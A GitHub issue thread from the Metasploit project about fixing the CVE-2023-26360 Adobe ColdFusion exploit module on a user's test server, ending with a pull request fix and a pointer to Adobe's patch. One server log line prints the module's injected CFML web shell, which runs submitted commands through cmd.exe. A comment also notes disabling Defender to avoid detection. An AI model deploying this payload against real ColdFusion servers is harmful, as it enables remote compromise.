### ISSUE TITLE
 RCE exploit for CVE-2023-26360 (Adobe ColdFusion) and an auxiliary module for arbitrary file read via the same vuln

### ISSUE THREAD

**Issue by NiSerm749** [rapid7/metasploit-framework#18237]
I installed the server. The software settings and versions can be seen below:

![image](https://github.com/rapid7/metasploit-framework/assets/84270324/b6d22793-42de-4247-8b9a-e6885d1068c1)

Target on:
![image](https://github.com/rapid7/metasploit-framework/assets/84270324/da2db726-796e-4317-a6e5-b0ae46633593)

Local Host on 10.10.1.50

Below is a demonstration of how the fileread module is used (the beginning and end are presented):

![image](https://github.com/rapid7/metasploit-framework/assets/84270324/4cbf0bf5-ff88-4a36-a985-6d61ae247a54)

![image](https://github.com/rapid7/metasploit-framework/assets/84270324/26ff1b91-8b0b-43c7-9881-a2471556d840)

I'll move on to the exploit. I tried different configurations and files several times. Now I will leave everything by default with the exception of IP and target:
![image](https://github.com/rapid7/metasploit-framework/assets/84270324/8e96ab48-a52e-4f1c-9911-35e0c3172b27)

On the server machine, as expected, an error log appears:

```
Jul 31, 2023 14:57:28 PM Error [http-nio-8500-exec-9] - JSON parsing failure: Expected '""' at character 2:'<' in {<cftry><cfif IsDefined('form.ubem') is 'True'><cfset ubem=form.ubem/><cfset esbf=['cmd.exe','/C',ubem]/><cfobject action='create' type='java' class='java.lang.Runtime' name='hohh'/><cfset hohh.getRuntime().exec(esbf)/></cfif><cfcatch type='any'></cfcatch><cffinally><cffile action='write' file='#GetCurrentTemplatePath()#' output=''></cffile></cffinally></cftry> The specific sequence of files included or processed is: C:\ColdFusion2021\cfusion\wwwroot\cf_scripts\scripts\ajax\ckeditor\plugins\filemanager\iedit.cfc''
```

The output in msf always the following:
![image](https://github.com/rapid7/metasploit-framework/assets/84270324/9e310528-f735-49e5-b5ce-7929f92c2dd6)
![image](https://github.com/rapid7/metasploit-framework/assets/84270324/7955d9d2-a646-4245-b056-33718f3cdb95)

There are no open sessions.

I can't figure out how to solve the problem. Also, check does not pass (image below).
![image](https://github.com/rapid7/metasploit-framework/assets/84270324/3e064596-0568-4612-8ca5-0401f58fb84e)

I would like to use this exploit for work. I would be very grateful if you could help me figure out what's going on here. Tried the same thing on Ubuntu 22.04 - same problem. I don't understand this software at all. (Adobe ColdFusion).

Msf_vers:
Framework: 6.3.19-dev
Console  : 6.3.19-dev

**Comment by NiSerm749** [comment]
I can execute commands in the console remotely with curl requests. This is how, for example, I can open a calculator (its work). (pic 1 and 2).

![image](https://github.com/rapid7/metasploit-framework/assets/84270324/156cf5cc-0c5a-4497-a7f8-106ee5702c7d)
![image](https://github.com/rapid7/metasploit-framework/assets/84270324/7b775be7-6def-4f46-ac88-938af05fb5e7)

Still no luck with sessions, I can't even catch them with a handler (pic 3-5)....
![image](https://github.com/rapid7/metasploit-framework/assets/84270324/f1a7fcbf-68a4-47f2-9475-3643989234af)
![image](https://github.com/rapid7/metasploit-framework/assets/84270324/e5af109a-203d-4c77-9c72-6439aa7d152d)
![image](https://github.com/rapid7/metasploit-framework/assets/84270324/d6553198-24f8-4cbc-b8b9-5d2fc81afeab)

**Comment by adfoster-r7** [comment]
cc @sfewer-r7 - is this something you ran into when doing module development? 👀

**Comment by NiSerm749** [comment]
@sfewer-r7 thanks for responding! I left the default settings (Server Configuration)

like this: 
![image](https://github.com/rapid7/metasploit-framework/assets/84270324/82c80559-80e4-4b70-8655-4a9d814d032d)

**Comment by sfewer-r7** [comment]
Thanks @NiSerm749 I was able to recreate the issue when installing ColdFusion in a Development profile rather than a Production profile.

Some return values need to be tested differently for exploitation to succeed. I have created pull request #18272 to resolve this issue and it works for me. Can you please test this pull request and see if you get a session back (Note: on a Windows target I had to disable Defender so it doesn't catch the JAR file in a Java Meterpreter).

**Comment by NiSerm749** [comment]
@sfewer-r7 I didn't know much about the app, I would never have thought that was the case) Thank you! I'll test it again tomorrow on Windows. I'll add the test results to the pull request. It's working now.

By the way, can you tell me, if not hard, how to close this vulnerability without updating?
I read https://attackerkb.com/topics/F36ClHTTIQ/cve-2023-26360/rapid7-analysis . Will I be able to fix it manually without updating?

**Comment by sfewer-r7** [comment]
HI @NiSerm749, AFAIK the only remediation solution available is to apply the latest updates as per the Adobe advisory (https://helpx.adobe.com/security/products/coldfusion/apsb23-25.html)

**Comment by cdelafuente-r7** [comment]
Closing this issue since it has been fixed in #18272
